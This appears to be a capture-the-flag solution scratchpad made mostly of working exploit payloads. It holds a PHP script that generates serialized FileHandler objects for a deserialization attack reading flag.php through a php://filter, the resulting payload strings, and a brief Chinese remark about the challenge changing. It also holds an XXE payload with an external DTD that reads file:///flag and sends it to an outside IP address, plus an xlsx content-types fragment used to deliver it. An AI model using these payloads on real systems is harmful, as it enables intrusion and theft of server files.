<?php
class FileHandler
{
public $op = 2;
public $filename = 'php://filter/read=convert/base64-encode/resource=/web/html/flag.php';
public $content = 'aaa';
function __construct()
{
$op = "2";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
}
public function process(){
}
}
$a = new FileHandler();
$b = serialize($a);
echo strlen($b);
echo "\n";
echo $b;
echo "\n";
$c = str_replace('*','\00*\00' ,$b);
echo strlen($c);
echo "\n";
echo $c;
echo "\n";
echo urlencode($b);
echo "\n";
echo urlencode($c);
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:67:"php://filter/read=convert/base64-encode/resource=/web/html/flag.php";s:7:"content";s:3:"aaa";}
O:11:"FileHandler":3:{s:5:"/00*/00op";i:2;s:11:"/00*/00filename";s:57:"php://filter/read=convert/base64-encode/resource=flag.php";s:10:"/00*/00content";s:3:"aaa";
这里好像中途改题。不用读绝对路径也可以。题很简单(改之后),不改之前去读取绝对路径就有点困难了,因为很少遇见。
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % remote SYSTEM "http://116.62.211.134:2333/evil.dtd">
%remote;
%all;
]>
<root>&send;</root>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://116.62.211.134:2333/%file;'>">